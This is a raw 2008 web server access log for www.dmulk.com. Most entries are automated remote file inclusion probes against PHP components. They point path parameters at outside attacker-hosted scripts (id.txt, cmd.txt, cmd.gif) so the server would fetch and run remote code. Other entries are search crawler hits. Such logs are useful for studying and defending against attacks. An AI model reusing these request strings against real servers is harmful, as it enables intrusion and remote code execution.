207.58.141.110 - - [23/Jan/2008:04:01:54 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [23/Jan/2008:04:01:54 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.149.42.126 - - [23/Jan/2008:04:02:27 -0800] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.149.42.126 - - [23/Jan/2008:04:02:27 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.149.42.126 - - [23/Jan/2008:04:02:28 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.61.30.100 - - [23/Jan/2008:04:02:30 -0800] "GET /logs/access_071214.log/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.e-sempione.org/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.30.100 - - [23/Jan/2008:04:02:30 -0800] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.e-sempione.org/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.30.100 - - [23/Jan/2008:04:02:30 -0800] "GET /logs/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.e-sempione.org/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.30.100 - - [23/Jan/2008:04:02:51 -0800] "GET /logs/access_071219.log/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.e-sempione.org/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.149.42.126 - - [23/Jan/2008:04:04:11 -0800] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.20.143 - - [23/Jan/2008:04:05:15 -0800] "GET /funny/?S=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.149.108.250 - - [23/Jan/2008:04:07:13 -0800] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:04:11:03 -0800] "GET /logs/access_071212.log//?mosConfig_favicon=http://www.sajin88.com/bbs/code/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:04:11:04 -0800] "GET //?mosConfig_favicon=http://www.sajin88.com/bbs/code/e.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:04:11:04 -0800] "GET /logs//?mosConfig_favicon=http://www.sajin88.com/bbs/code/e.txt?? HTTP/1.1" 200 31402 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.190.52 - - [23/Jan/2008:04:11:53 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.190.52 - - [23/Jan/2008:04:11:53 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.190.52 - - [23/Jan/2008:04:11:53 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [23/Jan/2008:04:14:42 -0800] "GET /logs/access_071216.log//?mosConfig_favicon=http://www.sajin88.com/bbs/code/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.38 - - [23/Jan/2008:04:16:19 -0800] "GET /tmp/?D=A HTTP/1.0" 200 1657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:04:17:25 -0800] "GET /logs/access_071224.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:04:17:25 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.169 - - [23/Jan/2008:04:18:15 -0800] "GET /funny/?M=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.55.165 - - [23/Jan/2008:04:18:19 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.55.165 - - [23/Jan/2008:04:18:20 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.79 - - [23/Jan/2008:04:19:22 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.149.108.250 - - [23/Jan/2008:04:20:53 -0800] "GET /logs/access_071214.log/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.149.108.250 - - [23/Jan/2008:04:20:53 -0800] "GET /logs/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.210.125 - - [23/Jan/2008:04:21:15 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [23/Jan/2008:04:21:16 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [23/Jan/2008:04:21:16 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [23/Jan/2008:04:21:49 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.99.194.216 - - [23/Jan/2008:04:22:08 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://66.206.168.162:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
208.99.194.216 - - [23/Jan/2008:04:22:08 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://66.206.168.162:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
217.149.108.250 - - [23/Jan/2008:04:22:30 -0800] "GET /logs/access_071219.log/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:04:23:14 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:04:23:55 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [23/Jan/2008:04:24:16 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
161.53.149.3 - - [23/Jan/2008:04:26:54 -0800] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:04:27:08 -0800] "GET /logs/access_071225.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [23/Jan/2008:04:28:24 -0800] "GET /logs/access.log HTTP/1.0" 200 8368 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
125.231.6.215 - - [23/Jan/2008:04:36:19 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.231.6.215 - - [23/Jan/2008:04:36:20 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.231.6.215 - - [23/Jan/2008:04:36:21 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [23/Jan/2008:04:37:30 -0800] "GET /minamijewelry/source_images/?D=A HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.200 - - [23/Jan/2008:04:38:32 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.75.39.66 - - [23/Jan/2008:04:39:13 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://half.ca/riCo?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
202.75.39.66 - - [23/Jan/2008:04:39:13 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://half.ca/riCo?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
74.6.22.126 - - [23/Jan/2008:04:40:51 -0800] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:04:45:43 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:04:45:43 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.53.69.10 - - [23/Jan/2008:04:49:46 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.drivehq.com/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.25.156 - - [23/Jan/2008:04:50:13 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:04:51:17 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:04:51:17 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:04:51:17 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [23/Jan/2008:04:51:30 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.140.130 - - [23/Jan/2008:04:52:10 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.146.140.130 - - [23/Jan/2008:04:52:10 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.38.10.218 - - [23/Jan/2008:04:55:10 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.61.30.100 - - [23/Jan/2008:04:55:33 -0800] "GET /class/class.dashboard_lms.php?where_framework=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
69.61.30.100 - - [23/Jan/2008:04:55:33 -0800] "GET /logs/class/class.dashboard_lms.php?where_framework=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
74.6.8.71 - - [23/Jan/2008:04:55:55 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.142.210.125 - - [23/Jan/2008:04:57:55 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [23/Jan/2008:04:57:56 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [23/Jan/2008:04:57:56 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
8.6.223.16 - - [23/Jan/2008:04:58:42 -0800] "GET /m2f/m2f_phpbb204.php?m2f_root_path=http://www.mta.cl/galeria2/galery2.jpg????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
8.6.223.16 - - [23/Jan/2008:04:58:42 -0800] "GET /logs/m2f/m2f_phpbb204.php?m2f_root_path=http://www.mta.cl/galeria2/galery2.jpg????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
91.142.210.125 - - [23/Jan/2008:05:00:35 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.231.6.215 - - [23/Jan/2008:05:01:02 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.39.66 - - [23/Jan/2008:05:02:10 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://half.ca/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
202.75.39.66 - - [23/Jan/2008:05:02:10 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://half.ca/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
161.53.149.3 - - [23/Jan/2008:05:04:19 -0800] "GET /logs/access_071214.log/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.53.149.3 - - [23/Jan/2008:05:04:19 -0800] "GET /logs/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.53.149.3 - - [23/Jan/2008:05:04:29 -0800] "GET /logs/access_071219.log/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.206 - - [23/Jan/2008:05:04:32 -0800] "GET /bikes/?M=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.18.66 - - [23/Jan/2008:05:04:37 -0800] "GET /logs/access_071229.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://awonderfulauction.com/logo/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [23/Jan/2008:05:04:37 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://awonderfulauction.com/logo/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [23/Jan/2008:05:04:37 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://awonderfulauction.com/logo/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.52.130 - - [23/Jan/2008:05:09:12 -0800] "GET /logs/access_071216.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.52.130 - - [23/Jan/2008:05:09:12 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.52.130 - - [23/Jan/2008:05:09:12 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.58.105.34 - - [23/Jan/2008:05:11:34 -0800] "GET /logs///index.php?autoLoadConfig[999][0][autoType]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.52.130 - - [23/Jan/2008:05:11:34 -0800] "GET /logs/access_071224.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:14:01 -0800] "GET /logs/access_071231.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:14:02 -0800] "GET /logs/access_071231.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:14:02 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:14:03 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:14:05 -0800] "GET /logs//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 32050 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:14:07 -0800] "GET /logs//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 31402 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:14:46 -0800] "GET /logs/access_071231.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:14:48 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:14:49 -0800] "GET /logs//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 31402 "-" "libwww-perl/5.805" "www.dmulk.com"
66.206.27.100 - - [23/Jan/2008:05:15:02 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://half.ca/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
66.206.27.100 - - [23/Jan/2008:05:15:02 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://half.ca/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.206.27.100 - - [23/Jan/2008:05:15:52 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://half.ca/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
66.206.27.100 - - [23/Jan/2008:05:15:52 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://half.ca/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:17:21 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:17:29 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Jan/2008:05:17:31 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
80.53.69.10 - - [23/Jan/2008:05:18:27 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.drivehq.com/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.53.69.10 - - [23/Jan/2008:05:18:28 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.drivehq.com/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.58.105.34 - - [23/Jan/2008:05:19:42 -0800] "GET ///index.php?autoLoadConfig[999][0][autoType]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.18.66 - - [23/Jan/2008:05:19:45 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://awonderfulauction.com/logo/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [23/Jan/2008:05:19:45 -0800] "GET /modules/My_eGallery/index.php?basepath=http://awonderfulauction.com/logo/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [23/Jan/2008:05:19:45 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://awonderfulauction.com/logo/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.19 - - [23/Jan/2008:05:21:24 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:05:22:13 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:05:22:14 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.146 - - [23/Jan/2008:05:22:27 -0800] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.213.202.12 - - [23/Jan/2008:05:23:20 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.202.12 - - [23/Jan/2008:05:23:20 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.204.234 - - [23/Jan/2008:05:23:21 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.213.202.12 - - [23/Jan/2008:05:23:21 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.143.105.93 - - [23/Jan/2008:05:23:35 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.138.76 - - [23/Jan/2008:05:23:56 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.143.105.93 - - [23/Jan/2008:05:24:04 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
